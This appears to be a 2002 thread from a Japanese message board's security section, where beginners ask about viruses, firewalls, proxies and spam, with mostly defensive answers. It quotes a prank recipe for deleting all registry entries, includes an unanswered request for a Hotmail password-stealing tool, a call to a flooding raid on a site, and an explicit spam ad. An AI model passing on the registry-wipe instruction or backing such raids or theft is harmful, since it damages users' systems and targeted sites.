(´-`).。oO(アメリカ政府なんて言ってるよ・・・そのうち宇宙人の仕業だなんていいだすんじゃないか・・・)
>ヤブじゃないが >そんな事いってるとヤブのでたらめを叩けなくなる。 >でたらめな回答は叩くべし。 ↑ってなんですか? なんで削除依頼出てるんですか?
602 :
206.157.65.167 :02/12/16 15:42
603 :
勉強してください :02/12/16 15:45
突然2ちゃんの文字が大きくなりました。ネットの文字すべてみてみたら 大きくなってます。なぜでしょうか?どうすればもとに戻りますか?
>>604 IEの場合なら、表示→文字のサイズで変更
608 :
名無しさん@お腹いっぱい。 :02/12/16 16:07
ADSLって国際電話につながりませんか?
>>608 ADSL回線から直接繋がることはない。
アナログ回線のケーブルが繋がってるなら、繋がることがある。
611 :
名無しさん@お腹いっぱい。 :02/12/16 16:13
hotmailのパスワードを抜くツールって何処で手に入るんですか?
薮叩きの粘着は相当DQNだな。
>>614 特に何かする必要はないと思うが、
念のためにウィルスチェック。
エシュロンとプロキシに何の関係が?
絶食
621 :
bloom :02/12/16 18:44
622 :
名無しさん@お腹いっぱい。 :02/12/16 18:54
串なんて何で通信内容見られるのに使ってる人多いんですか?
623 :
名無しさん@お腹いっぱい。 :02/12/16 19:17
1.自作自演 2.IPを偽装するため 3.連続投稿を回避するため 4.特殊な環境、たとえば海外とかからの書き込みとかの対応のため
結構ログ溜まるからねぇ。。
いちいち見てま千円。。
まあかつては串のキャッシュ機能を利用するって目的もあったんだけど
今はあんまり意味無いかなヽ(´ー`)ノ
>>622
625 :
名無しさん@お腹いっぱい。 :02/12/16 19:38
windowsで動くパケット送信ツール(どんなぱけっとでも送信できる 奴)でいいのあります??
エロ画像落とすのによく使うよ>>串
629 :
名無しさん@お腹いっぱい。 :02/12/16 23:18
>>624 >結構ログ溜まるからねぇ。。
>いちいち見てま千円。。
これは串鯖を立ち上げてログをためてたということ?
詳細キボンヌ
630 :
名無しさん@お腹いっぱい。 :02/12/17 00:25
ここに来て聞いてと言われました。送信してないのに、勝手にメールを送信してしまうウィルスは 何ていうものですか
633 :
名無しさん@お腹いっぱい。 :02/12/17 01:14
>>631 ワームはかなり悪質ですか?
>>633 知らない間に他人にウイルス送信、トラフィック増加など、自分にも他人にも迷惑がかかる。
5 名前:.NET.hack.com ◆NAMAemoU7s :02/12/17 00:04 ID:n7HYw+KP 誰でもできる簡単な最強ハッカー使用パソコンの作り方を教えます スタートメニュー ↓ 「ファイル名を指定して実行」を起動し、 regeditと入力してEnterする ↓ でてきたウィンドウ内に表示されてる物は、 MS社がいれたハッキングストッパーみたいなものなので、 消せるだけ消す。 消し方は、右クリック→削除 とするだけ。 消した数が多ければ多いほど強いパソコンができあがるので、 気合いを入れて消しまくってください。 確認ダイアログがでても、無視しなくてはなりません。途中でやめると、失敗ですので最後まで消してください。 ↑これってどうなんですか? 試してみてもいいですか
>>635 試す前に検索エンジンで「レジストリ」をサーチしてみるんだな。
639 :
名無しさん@お腹いっぱい。 :02/12/17 02:03
質問なんですけど、名前のとこにfusianasanていれるとどうなるのですか? ほかのとこで書いてあったもので
>>635 よりによってセキュ板で誰が引っかかるんだよ。
>>639 リモートホストが出る。
リモートホストって何ですかという質問には答えない。
641 :
名無しさん@お腹いっぱい。 :02/12/17 02:09
>640 ありがとうございます。 リモートホストとは何ですか?と聞きたいです;; それがでるとなにかまずいのでしょうか? わかりやすくおしえていただけませんか?
644 :
名無しさん@お腹いっぱい。 :02/12/17 02:18
>642 643 ありがとうございます くだらない質問なんですね;;
おーい誰かー
「自分で調べろこの糞虫」って
>>645 にいってやってよー
さっきノートン インターネット セキュリティが 「セキュリティ警告!‘The Thing'トロイの木馬のデフォルト遮断」 と騒ぎ出しました。 最近の不正侵入試行:5とか出てるんですが、どう対処したらよいでしょう? ウイルススキャンはしているんですが・・・。
>>648 説明書かヘルプでFWのログの見方についてしらべたらどうですか?
もちろん手元にあればの話ですが。
>>648 もう1回その警告を声出して読んでみろ。
1回じゃだめだろ 100回くらいだな 窓を開けて大声で
すいません。無知すぎてFWさえわかりません。 出直してきます。御迷惑をおかけして申し訳ありませんでした。
>>653 ご親切にありがとうございます。
不正アクセスなんて初めて見たので取り乱しました。
>>653 禿同。
だが、ウイルス対策ソフトって、そのようなびっくりさせるメッセージ類多くない?
「ブロックしたので安心よん♪」とか出ればいいのにね。
(だからアレはケンシロウなのか・・・?)
>>653 お、俺のパソコン「が」狙われているッ!
657 :
名無しさん@お腹いっぱい。 :02/12/17 17:34
接続プロバイダ名とかIPアドレスとかが表示されてしまう掲示板に書きこむ際に、 プロバイダ名等を表示されないようにするにはどうしたらいいのでしょうか? IEのインターネットオプションのどこだかを設定すればいいような事を聞いたのですが。
こんなメールが届きました。
<送信者>******@hotmail.com
<本文>Kaspersky give you the W32.Klez.E removal tools
W32.Klez.E is a dangerous virus that spread through email.
For more information,please visit
http://www.Kaspersky.com ウイルスの注意をうながすメールなんですかね。添付ファイルもあったけど、
開いても大丈夫ですか?
こちらに誘導されましたので、改めてお願いします。 初心者的質問ですみません。ADSL導入に伴いウイルスバスター2002 を入れていますが最近ファイアウォールの警告が頻繁に 出ます。主にNetBIOSとかいうもので必ずしも不正アクセス ではないらしいのですが、一日数回アタックしてくるので 心配です。 それはともかく、そろそろ2003にアップグレードしたい のですけどそうなると一旦2002をアンインストールしなきゃいけません。 その間にアタックしてやられたらどうしようかと不安でまだ出来ていません。 どうか教えてください。
663 :
センドメール :02/12/17 17:51
情報漏洩を監視するため、社内からの送信メールを全てBCCでセキュリティ責任者のアドレスへ送付したいと思っています。(送信ログを落とす方法ではなく)sendmailを使用しているのですが、実現方法をご存知の方教えてください。
664 :
名無しさん@お腹いっぱい。 :02/12/17 17:53
>>661 ファイアウォールアンストールして 変わりにZoneAlarmにしる
sendmail社に聞けば?
>>661 > それはともかく、そろそろ2003にアップグレードしたい
> のですけどそうなると一旦2002をアンインストールしなきゃいけません。
> その間にアタックしてやられたらどうしようかと不安でまだ出来ていません。
不安ならLANケーブル抜きゃいいだろ
670 :
bloom :02/12/17 18:16
671 :
名無しさん@お腹いっぱい。 :02/12/17 18:44
質問です。 「ウイルス」と「ウィルス」、どちらが一般的な書き方ですか? マジレスおながいします・・・。
672 :
名無しさん@お腹いっぱい。 :02/12/17 18:46
-------変態・MTTどこでも-------
---●●●変態痴女を紹介致します。●●●---
例えば>欲求不満オマ●コヌレヌレ女・露出オナニー痴女・
フェラチオおしゃぶり女・ミニスカ・ノーパン娘・巨乳パイズリ娘・
アナルSEXおねだり娘・オマ〇コ弄られマン汁グチョグチョ女・
SM牝豚・緊縛・浣腸・スカトロ・等・・・刺激を求めています。
●●●学生・OL・主婦・モデル・牝豚・女王様・オカマ等・多数!●●●
090-8002-8356番
下のカタカナを小文字に変換してください。
http://www.エムティーティー.jp/i
673 :
名無しさん@お腹いっぱい。 :02/12/17 18:51
ルータのファイヤーウォールが外れません… どうしたらいいでしょうか?
>>671 google
日本語のページからウイルスを検索しました。 約479,000件中
日本語のページからウィルスを検索しました。 約482,000件中
>>674 Thx!!!同じぐらいですか。
しかし…それだとブルースウィルスとかも混入していると思います…
どっちがいいのだろう・・・
>>676 めちゃめちゃThx!
はぁ、ここの板の皆さんはみんな優しいですね…。
かなりずっと悩んでいた問題だったのですっきりしますた。
では半角板に帰ります。
>>677 (・3・) エェー 正確にはヴィールスだC
>>675 (・3・) エェー 正確にはウィリスだYO
↑あのなぁ、おまえなぁ、こういう時はブルースウイルスっていうんだよ。わかったか。
682 :
名無しさん@お腹いっぱい。 :02/12/17 20:12
こちらで質問した方が良いとのことですので、 流れてまいりました・・・。 ノートンインターネットセキュリティのせいで、 IEのオートコンプリート機能(IDやパスワードの記憶)が できなくなることってありますか? ある掲示板で毎回入力しなければなりません。 回避方法があれば教えてください。
>>682 (・3・) エェー オートコンプリートの設定タブはオンにしてるNO?
>>683 お気遣い、ありがとうございます。
先ほど、パソコンのメーカーサポートのほうに
電話して症状を言ったところ、
パソコン自体のほうに問題があることがわかりました。
修理に出します。
686 :
名無しさん@お腹いっぱい。 :02/12/17 21:13
セキュリティと関係ないね pcqa板に行きな
こんにちは。 質問です。 私はMSNのメールを利用しているのですが、 先日受信箱にいこうといしたら 『セキュリティ証明書が期限切れ、もしくはまだ有効になっていません』 みたいなことを表示されました。(それまで普通に使えました。) 期限が下に記入されていたので見たところまだ、期限はきれてませんでした。 どうしたら、よいでしょうか。 (MSNの受信箱に行く以外にも プロバイダのサイトでアドレス変更などの画面に行こうとしたら 同じ症状が見られました。) どなたか教えて下さい。よろしくお願いします。
MSNのサポートに問い合わせる。 なんか同じ奴が質問してないか?わざと そろそろネットワークセキュリティに関係ある質問をしてくれ
---esboss---otakara/-----/img20021214230730.gif ↑みたいなやつ何か知りませんか?偶然なのか、踏んだ次の日にハードディスクが 壊れたんですが。
692 :
名無しさん@お腹いっぱい。 :02/12/18 01:34
たすけてください;;; クリスマスって言葉が入ってるメールが知り合いの名前で 送られてきてたため不用意に添付を開いてしまいました; ウイルス感染は初体験で混乱しまくりです。。。 こんな内容書くのは気が引けるのですがどうしたらいいか わからなくて
ウイルスチェックっていうのはウイルススキャンってやつですか?
>>694 よくあるジョーク画像。実際のウイルスなら、完了画面は出ません。
ハードディスクの寿命とか、他の場所に原因あり。
あと直リンはやめて。
>>695 その通り。
>>696 どうも。。直リンはまずいと思って一部抜かすつもりがそのままコピーしてしまい
ました。回線切って逝きます。
なんか車板や一部の板に行くとバーを動かしただけで真っ白になって何も見えないんですけど、どうすればいいんですか? 板違いなのは申し訳ないんですけど、初級ネット板も真っ白になっちゃって… 教えてください
>>698 メモリ不足だと思うが。必ず起きる現象?
>699 最近、explorerを変えたんですけど、それから起きたような、そうでもないような… 車板にいくと必ずおきます でヤフーに戻ろうとするとこれまた真っ白 でも、一部の板や車板を経由しない通常のサイトは問題なしなんです
ていうか「真っ白になる」がわからん。ページ表示欄だけ(メニューや枠はそのまま)? ページのソース表示させるとなにか書いてある? ていうかIEの出すエラーページではない?
すんまそん、keiro fire wallを購入しようとおもったのですが ホームユーザーフリーとありますね。 これって30日たってもずっと使い続けれるってことですか? 見たところ、別バージョンが存在してるわけでもなさそうですし。 ホームユーザーなので、ただですむならありがたい話。 んでも、ホームユーザーとビジネスユーザーって どうやって見分けるのでしょう、登録とかそういうのした覚えもないし。
>>703 >ホームユーザーフリーとありますね。
>これって30日たってもずっと使い続けれるってことですか?
そういう事。
ホームユーザーとビジネスユーザーの見分け方は無し、利用者の良識のみ。
セキュリティに気を使う人々は最低限の不文律・モラルを持っている事を祈るだけ。
>>700 そうなんですか、ありがとうございます
ちなみに
shiled up!
http://grc.com/x/ne.dll?rh1ck2l2 で調べてみたところ
SygateFW は all stealth
KeiroFW はnet biosだけstealth
MSFTDSとRPCがOpenで
後はClose,
これって、Sygateに比べるとだいぶ性能が落ちるようですが、
個人使用では問題ないんでしょうか。
SygateではLANの方で不具合が出て、良いソフトを探しているのですが。
うーん、すべてうまくいかせるのは難しい、、
ちなみにPCが荷台あって、一方をネットに接続して、もう片方をw2kのネット共有で
ネットを使えるようにしてあります。
Sygateだと、2個目のPCからはメインの方にアクセス出来なくなるんですよね、
これは、それらしい設定を変えても反映されない様子、バグだと思います。
Keiroの方では、ファイルの共有はできるんですが、openポートが二つあるのは不安だ、、、
しかし、FTPサーバしか走らせてないのに、なんでだろう。(サーバのポート番号は適当に変えてます
知り合いしか使わないので)
質問ついでにRPCとMSFTDSがopenな理由と、その意味、対処法など教えて頂けたら幸いです
…ルールは自分で設定しろ。 ルールの自作が(機能的にor難しすぎて)できないなら そんなソフトはそもそも使うべきではない。 巷でどんなにもてはやされていてもね。
>>706 closedをstealthに自分で設定出来ると言うことですね、
やってみます、ただ、そういう表記はどこにもみあたらないので
Sygateでは自動でStealth,Keiroでは自動でCloseかOpen
になっていました。
全部をStealthになれるようにがんばってみます、おそらく
Keiroにも、パケットをいっさい返さないという設定があるのかな??
708 :
名無しさん@お腹いっぱい。 :02/12/18 12:23
ルーターにセキュリティ機能があって、 FWやアンチウィルスソフトと同じように使えるものってありますが、 そういうのと、実用的にはどうなんでしょうか? ソフトだと各PCに入れる必要がありますが、ルーターの追加機能だと いわゆる入り口でふさいでくれるので便利かなと思うのですが。
709 :
名無しさん@お腹いっぱい。 :02/12/18 12:33
710 :
新ワーム? :02/12/18 22:03
iraq_oil.exe は新型ワームだから、対ウイルスベンダーから最新定義ファイル公開されるまで、再インストールするまでネットに繋がないでください。 おながいします。 と、プロバから電話きますた。 Windows2000Pro SP3 環境にて C:\WINNT\system32 から同名のファイル見つかりガクガクブルブルを漏れを助けてください。
445かぁ。 専用スレ、誰か立ててくれませぬか?
微妙にへなちょこっぽいイメージなんだけど、流行るのかなあ。
ありゃ、イラクオイルってW32.HLLW.Liotenと同じ奴やん。。。。。。
NIS2002をアンインストールしてからNIS2003をインストールしようとしたところ、 NISをインストールする前にコンピュータを再起動して以前のアンインストールを 完了するひつようがあります・・・・」のエラーが出てきて、NIS2003を インストールすることが出来ません。 一応シマンテックのHPのサポートにあったこと(tempの削除。RNIS,RNAV等のツールの使用 norton や symantec等のファイルの削除、関連レジストリの削除)を試してみたのですが だめでした。試しにもう一度NIS2002を入れてみたら出来たのですが、購読期限は 何故か前のまま表示されました。シマンテックのHPに載っていないことが ほかにもあるのでしょうか?ちなみにOSはWIN2K。IEは6です。
719 :
新ワーム? :02/12/18 22:52
>>712 他のみなさま
直電かかってくるレベルのどえらい物と思ってあわててますた
へたれな漏れやプロバ担当者共々感謝します
720 :
名無しさん@お腹いっぱい。 :02/12/18 23:31
TCP SYNFLOOD攻撃ってなんですか? メルコの無線ルーターを今日繋ぎました。 すると、その攻撃をブロックしたって出ます 昨日まではその攻撃にやられていたと思うんですが 自覚は全くありませんでした。 ブロックしてるし、自覚もなかったのですが 少し気になったので・・・
721 :
名無しさん@お腹いっぱい。 :02/12/18 23:39
動画に埋め込まれるウイルスってありますか? 友人から危険だと脅されました Mac,IE5,OE4.5使ってます
>>721 >>Mac,IE5,OE4.5使ってます
723 :
名無しさん@お腹いっぱい。 :02/12/19 00:00
724 :
ひよこ名無しさん :02/12/19 00:02
ネットやってたらいきなり、 □←こんな画面が出てきて 上にメッセージで下に rdふぁ」:あえ」あくぇwttふぁ こんな感じ(もっと荒れてた)が出てきて 怖くなってオルト+F4押して終わりました いったいなんなのですか
726 :
名無しさん@お腹いっぱい。 :02/12/19 00:09
ノートンの体験版入れたら添付ファイルが削除されるようになりました。 どうしたらいいんですか?
727 :
名無しさん@お腹いっぱい。 :02/12/19 00:10
↑メールの添付ファイルのことです
>>720 TCP SYN 送って、ACK 返さずに TCP SYN だけ洪水のように送りまくる。
だから、TCP SYNFLOOD 。つか、google いったらもっと丁寧に書いてあるトコあるだろ。
なんでココに来た。
ショックウエーブのバージョンってどうやって調べんの?
>>729 ネタか?
IEの「ツール」→「インターネットオプション」→「全般」→
「インターネット一時ファイル」→「設定」→「オブジェクトの表示」
んでずらずら出てくるからshockwaveのアイコンを右クリック。
バージョンタブを見るよろし。
731 :
名無しさん@お腹いっぱい。 :02/12/19 09:02
>>721 >動画に埋め込まれるウイルスってありますか?
セキュリティーホールを利用したものがあるようなのでIEだけでなく動画再生に
関係するウィンドウズメディアプレーヤーとかreal playerとかflashとかを
最新のものにするかパッチをあてるかしてください。
http://vbc.trendmicro.co.jp/vbc/monthly/200210/vclass1.asp >2002年7月下旬に発見されたメニーマイズ(WORM_MANYMIZE.A)は、
>Internet Explorerに加えて、Windows Media Playerのセキュリティホール
>も利用します。ここで利用されているWindows Media Playerのセキュリティ
>ホールとは、対応の動画ファイル(通常は安全なもの)を実行すると、
>同時にEXEファイルなど(つまりウイルス)を実行させることが可能になる
>というものです。メニーマイズは、Internet Explorerのセキュリティホール
>で動画ファイルを自動実行させて、さらにWindows Media Playerの
>セキュリティホールでウイルスを自動実行させるというきわめて手の込んだ
>ウイルスなのです。Internet Explorerのセキュリティホールがふさがれて
>いても、動画ファイルを自分で実行すると、ウイルスも同時に活動を始めて
>しまいます。
>>732 おい荒らし、いい加減帰れ。昨日は平和だったのに。。。
>>732 有難うございます。
私自身でもあちこち調べた結果、動画系のウイルスや
>>731 のような事も
多数ありました。SWFファイルは仕事で扱っているのでMacといえども
油断なりませんね
>>722 の意味がいまだ理解出来ませんが...
>>734 あとはNorton Antivirus for Mac 常駐させとく。
>>732 は有名な荒らしなのでスルーしてください。
736 :
名無しさん@お腹いっぱい。 :02/12/19 10:57
プロクシを設定する以外に 自分のIPを偽装する方法はありませんか?
738 :
名無しさん@お腹いっぱい。 :02/12/19 11:30
739 :
名無しさん@お腹いっぱい。 :02/12/19 11:43
ウイルススキャンしようと思ってやってたら途中で 消えてしまいました、何回やっても途中で消えてしまうので 結局PCを初期化してしまいました。 でも今後の参考に初期化以外でそういうのの対処法なんかありましたら 教えてください(><)
742 :
名無しさん@お腹いっぱい。 :02/12/19 12:44
WinXPと他のOSでTCP/IPでLANを組んでいます。 ルーターを介して、WAN側はCATVネットです。 セキュリティを考えたら、XP(もしくはWin2000)は、NBTを[無効]にした方が 良いと聞いたのですが、現在は[規定値]になっています。 人に聞くと、ここは[無効]にして「TCP/IPによるファイルの共有」は 使わない代わりに[NetBEUI]を使うのが良いとのことですが、実際どうでしょうか? [規定値]にしておくとどう言う動きになるんですか? あと、調べていたら、[無効]にするとファイルの共有が出来ないので、 フォルダにパスワードを設ければ回避できると判ったのですが、 WinXPにNetBEUIをインストールしないでファイルの共有を使った場合、 必然的にTCP/IPによる共有になるので、危険なのでしょうか?
質問するときはageた方がいいと思われ。age。
>744 ありがとう。すみません。
pen2 400mhzのマシンなんですが…ノートンとバスターどっちがイイですか?
>>746 2003年版はどっちも重め。
CPUよりもリソースの方が重要。OSは何?
Win98です
NIS2002を使ってるんですけど、ノートン有効にしてるとIEに繋がりません。無効にすると 問題なくネットに接続できます。ノートンのインターネットアクセス制御ではIEを「全てを許可する」 に設定してるのに駄目です。どうしたらいいんでしょうか。ケーブルネットでOSは98、IEは6.0です。
750 :
名無しさん@お腹いっぱい。 :02/12/19 19:31
質問です。 アクセス制御に失敗している BBSなどを覗き見るのは不正アクセスに該当するのでしょうか? 管理者はパスワードをかけているつもりのようですが (上のディレクトリに認証ページのようなものがあり。恐らくそのページから 隠しBBSにジャンプする仕組み) そのBBSのURL直リンクで丸見えなんですが・・・
>>750 法には抵触しないが恨まれる可能性はあり。
すみません、質問があるのですが… 最近になってタスクトレイに見慣れないアイコンが出現したのです。 しばらくは気にもとめませんでしたが、 先ほどいきなりアイコンの文字が赤くなって画面のマウスカーソルが リモートコントロールされているような感じで勝手に動き出したのです。 アイコンは2台のPCが繋がっているような絵に青いRの文字がのっていて ダブルクリックすると「CurrentConnections」というキャプションのウィンドウに 「No Connection」と表示されています。 再起動するたびに真っ先に出現し、手動での終了も出来ません。 これは一体何なのか教えていただきたいのです。 危険なものであるならば、その消去方法までご教授お願いします…
754 :
名無しさん@お腹いっぱい。 :02/12/19 20:21
変なメールが来た。
重要度”高”
送信者:European Top10 <
[email protected] >
件名:Presentation in Japan (to: Program Director)
Now you can be the first getting The EuroTop10 for your station in your market!
The European Top10 is a 3 hours weekly countdown with the hottest hits all over
Europe. The show produced in affiliation with leading stations in more than 20
countries is now available in Japan and you can reserve it in exclusive using the form
above or faxing your information to + (1) 413.80.32.768.
An innovative production than can be customized for your station and coproduced in
Japanese. Every week together with the show you will get:
- Version for co-production
- Script and production guide
- Chart updated weekly
- Info about the artists featured every week
Also you can add your sponsor and station name, and insert commercials. Just tell us
what you need and we'll produce a special promo in your language so you'll see how
it will sound for your station.
Special price for local stations is $275/month (all included).
Stand out from your competition and reserve the EuroTop10 now!:
or complete the form and we'll send you more information.
Best regards,
ヨーロッパのサイトなんか行かないし
身に覚えが無いのにプロバのメアドに来た。
http://www.eutop10.com サイト本体はここらしい。行ってはみたけどスクリプトONするんが怖くて
表紙意外なにも見れない。どんなサイトすか?
757 :
名無しさん@お腹いっぱい。 :02/12/19 20:25
>>751 どうも。
urlが思い切り晒されていたので
思わず踏んでしまいました。
そのBBSには二度と関わらないようにします。
>人柱 やっぱ危険なサイトなの? オレの設定じゃ E U T O P 1 0 C H E C K I N G F L A S H P L U G - I N しか見れない。
ロボット検索じゃサッパリだったんで誰か訳せる人いない?
なあ、 セキュリティとどういう関係があるんだ?
SPAMぐらいで騒ぐな
>>743 NetBEUIはルーティングできないプロトコルというか、ルーターを超えられませぬ。
だものでこれのみでLAN内部でファイルをやりとりする分には安全、という話ですねん。
NBT(NetBIOS over TCP/IP)はルーターを超えられまするんで、これを有効にするのはダメと。
んでもTCP/IPの設定のWINSタブで、「NetBIOS over TCP/IPを無効にしる」にしても、結局いたずらされる機会はあります。
安易な解決法として。
まずはルーターで、WANというかインターネット側から、LAN内部方向へ向けてのPort137、138、139、445のトラフィックを全てブロックしてくだされ。
ついでに135も。
そすれば(どれかをダイヤルアップとかAir'Hで繋ぐ機会が全く無いなら)、共有ファイルを抜かれる可能性は(ルーターの設定ミスがなければ)、まず無いって思いまする。
参考までにどんぞ。
http://pc.2ch.net/test/read.cgi/sec/1033726535/
766 :
名無しさん@お腹いっぱい。 :02/12/20 00:30
IEのホームをyahooに設定しているのですが、 それがシャットダウンして立ち上げを何回かやってる内に エロ画像に書きかえられてしまいます。エロサイトで 間違って変な広告をクリックして以来この調子です。 どこに原因がある可能性が高いでしょうか?
>>766 エロ広告クリックしたからだよ。いい加減にすれたいくらいよんどけ
769 :
すみません :02/12/20 00:38
> IP抜いたぞ
>
ttp://www.dyndns.org/cgi-bin/check_ip.cgi このような書き込みを、
いろんな掲示板で良く見るのですが、これ何のアドレスでしょうか???
教えてください(マジでよろしく願いします)
おそらく、自分のIPを調べるものと思うのですが、
クリックすると抜かれるのでしょうか??
いちおうググッたのですが、
IPアドレスの更新を自動的に行ってくれるソフトウェアに使用すると言うことしか
分かりませんでした・・・
(他のスレに書き込んだものですが、回答してもらえなかったので、
こちらにコピペしました。ご了承ください)
>>769 今アンチウィルス入れてないからリンク先踏んでないけど、
「IP抜いたぞ」 ってやつは、「僕は馬鹿です!」って言ってると思え
IPアドレスが知られたところで使ってるプロバイダくらいしかわからん
よって、全く気にする必要なし
>>772 荒らし依頼、了解すますた。。。。。(嘘
774 :
769 すみません :02/12/20 01:11
>>771 ご回答ありがとうございます。IP抜かれても特に問題ないのですね。
このアドレス踏んでみたのですが、確かに僕のIP表示されます。
やっぱり抜かれているのでしょうか?
>>774 どっかにアクセスすると相手にIPアドレスが渡るんだよ、そうじゃないと
基本的には通信できないし・・・
別に自分のIPアドレス表示されても問題なし、むしろ表示されないほうが怖い
776 :
名無しさん@お腹いっぱい。 :02/12/20 02:10
ちょっと不安なのでどなたか御教授ください。 ノートンのInternetSecurity2002を入れているのですが、 週に1度くらいのペース(正確ではありませんが)で 下記のような警告が出ます。 次の通信を検出しました アプリケーション: C:\WINNT\system32\services.exe プロトコル: UDP(インバウンド) リモートアドレス: localhost(127.0.0.1) : epmap(135) ローカルアドレス: 0.0.0.0 : 1028 IEとメーラーとかちゅーしゃしか立ち上げていない状態で 無操作時に突然この警告が出てきます。 一応最新のデータでウィルスチェックはしているので 感染しているとかいうことは多分ないと思うのですが、 このファイルが何をしているのか得体が知れないので、 一応毎回通信を遮断しています。 このファイルがどういうファイルで何をしているのか おわかりの方がいましたら、教えてください。
777 :
名無しさん@お腹いっぱい。 :02/12/20 02:36
VBS_REDROF.AまたはVBS_REDLOF.GENのウイルスについてや 駆除法が書いてあるスレってありませんでしょうか。 板違いでしたらすみません。
↑766?
>>778 ありがとうございました。
すごく参考になりました。
781 :
名無しさん@お腹いっぱい。 :02/12/20 03:28
コンピュータウイルスは誰が作ってるの? なんのため?
783 :
名無しさん@お腹いっぱい。 :02/12/20 03:41
質問です…。 アナログとCX4?とかでアドレスから住所って調べられるの?
784 :
( ・_・)y─~~~ :02/12/20 03:46
メールアドレスそのままクリックすると電話に繋がる事があります。
785 :
名無しさん@お腹いっぱい。 :02/12/20 03:48
YAHOOアドレスから住所など調べる事は可能なんですか?
787 :
名無しさん@お腹いっぱい。 :02/12/20 03:56
外国(マレーシア)の人と日本語で文通してたら ある日その人のメアドから Subject: Fwd: Funny comics!!!! be careful la~ hehehehehehehe~~~ といういかにも怪しいメールが届きました。 受け取り確認で「はい」と押したあと メールを開いてみたら??????????ばかりで読めませんでした。 添付ファイルもあるみたいなのですが怖くて開けません。 題名を右クリック>>プロパティ>>詳細>>ソースで ソースを読んでみたら、本文??????????の下に フリーのメアドが沢山ありました。hotmailが多かったです。 いろんなところを経てきたメールのようにも見えますし いろんなところに自動でメールを送ってしまった気もします。 いったい何のメールなのでしょうか。 もしかして私は何か間違いをしてしまったでしょうか? どのような対応をすれば良かったでしょうか? 親切な方、教えて下さい。 因みにw98で付属のoutlook expressを使っています。 ウイルスバスター2001も使っていますが何も反応はでませんでした。
788 :
名無しさん@お腹いっぱい。 :02/12/20 03:59
そんな事が可能なんですか? 他人のYAHOOアドレスから住所を調べることが…。 では、アナログとCX4があればアドレスさえ手に入れば簡単に他人の住所や名前が分かってしまうと言う事ですか?
xupiterという検索?スパイウェアに寄生されてしまい ファイルの削除はしたのですが ツールバーにその跡が残ってしまいました。 右クリックのメニューで標準のボタン・アドレスバー・リンクと共にxupiterが表示されてしまいます。 どなたか削除する対処法を教えてください
2ちゃんねる VS TIME・・・
その戦いの歴史は、まさに近代兵器の見本市だった
田代砲にはじまる数々のスクリプト兵器を経て、到達した97式アラファトマシンガン
これはまさに最終兵器として、猛威を振るった
だがしかし、ついにTIMEはこれらの兵器全てを完膚無きまでに無効とする
パプリカの設置に成功した
武器を奪われた我々に残されたもの ・・・それはチョップ
手動で一撃一撃叩き込むチョップ。地味で威力も極限まで小さなチョップ
ただそれだけと、なってしまった
だがしかし、チョップといえども決してバカには出来ないということを!
そしてこのような手段にまで出たTIMEを今一度
我が2ちゃんねらーの総意を込めたチョップを以て、叩き壊したい!
有志たちの参戦を、ひとりでも多くの戦士の挑戦を待つ!!!
http://live.2ch.net/test/read.cgi/festival/1040297042/
>>792 >危ない仲間達で、れっつらごぉ〜〜!
君一人でか?
>>787 ウィルス検知が反応しなかったのならそのまますべてを削除。
>765 ありがとうございます。 やっぱNBTは無効にして、内部はTCP/IPの代わりに NetBEUIでつないでいる人が多いんでしょうか? プロトコルを混在させたくないんですが、 NBT有効(自分の場合は[規定値]ですが)はやばそうなんで、 ルーターで対処しときます。 ちなみに、「Shileds Up!」 をやったら139は 「Stealth」でした。
>>795 ありがとうございます。
最新のウイルス検知に引っかからなくても危ない
と言うことはありますでしょうか。
スクリプト?はウイルス検知に反応しない
とか聞いたことがあるのですが意味が分かりませんでした。
もし危険でないのならなんのメールか調べてみたいのですが。
なぜ串を使って2チャンネルに書き込めるんでしょうか? 今串を使ってます・・・ それが変なんです、今まで色んな串を使って試してたけど2チャンネルに書き込めた事なんてなかった。 もしかして串によってはプロ串と判断されない事もあると言う事ですか? とにかくこんな事初めてです。
>>798 いままで使ってたのはアマ串だったんじゃないかな?
あとで高い請求書が来るかもね。プロなんだもん。
800 :
名無しさん@お腹いっぱい。 :02/12/20 19:00
>>799 そんなのあるんすか?
アマ串とかプロ串って?登録された即出と言う奴?は2チャンネルに
書き込めなくしてて、最新の出たばかりの知られてないプロ串は書き込めると言う事かな。
まあ明日には書き込めないんでしょうが。
>>743 =796
多分、NetBEUI使わないで、LAN内部はTCP/IPだけで、NBTは無効な人が多いんではないでしょか。
んで、恐らくPersonal Fire Wallを利用していないケースも多いかと。
何故かって言うと、ルーターでそゆのはWAN→LAN方向のはブロックできるし、企業ではNetBEUIだけだとActive Directoryに対処できないからです。
ルーター無くても、MSネットワーク共有クライアント等を利用しないときは利用できないようにする、これ基本。
>「Shileds Up!」 をやったら
それって、君のパソじゃなくて、ルーターをポートスキャンしてるんではないでしょか。ひょっとして。
なおPersonal Fire Wallを利用する意義みたいなのは。
ダイヤルアップユーザーとか、ルーター使ってないとか、「LAN内部だろがみんな敵じゃぁ!」みたいな人とか。
またウイルスや罠ファイルやお行儀の悪いアプリによる不慮の接続に慎重に対処したいからだと思いまする。
もちろんツール等に頼らずパソの設定を完璧にするってのも、アリです。
いずれにしても、「どの程度でオチをつけるというか納得する」、ってのは、君が「何をどの程度まで固めてそして利便性を失うのか」次第です。
それは各々の考えとかポリシーによって皆それぞれ異なるはずですから、最終的に決めるのは、君次第です。
長文ご容赦。
長すぎると読みづらいってのを、我ながら何となく実感。
805 :
名無しさん@お腹いっぱい。 :02/12/20 20:17
よーわからんがチェックだけ(適切に設定されるわけではない)らしいから 毒にも薬にもならないふつーのソフトなんじゃないかしら。
>>805 IPC$でちゃう内容のレポートが出ますた。
塞いでいるんですが、2で。
管理共有が無効なのに、有効って表示がでますた。
テストしたのはサブパソのXP homeだし。
それ除くと、漏れのパソの設定をちゃんと全て正確に検出しますた。
つか、XP対応じゃなかったのねん。スマソ。
>>807 レスありがとうございます。
残念ながら漏れの環境では実行出来ませんですた。(´・ω・`)
XPSP1PRO
iraq_oil.exe Norton AntiVirus 最新定義ファイルにより削除完了
補足ですが。 スタンドアロンなんでサービスからServerを無効にしてるけど、何故か有効になってると警告がでた。
あぼーん
>>813 すげーマジレスですが。
板違いだと思いまする。
>>761 じゃあ例えば
スクリプトONにしとくと、勝手にメアド読まれるなんてことはない?
816 :
名無しさん@お腹いっぱい。 :02/12/20 21:17
自分は見てないのに、勝手にサイトを見て回るウイルスとかありませんか? ブラウザの履歴に見覚えのないものがたくさんあったのですが(しかもアダルト関係)。
>>816 エロ親父かエロ息子かエロ兄弟を小一時間問い詰めろ。
818 :
名無しさん@お腹いっぱい。 :02/12/20 21:40
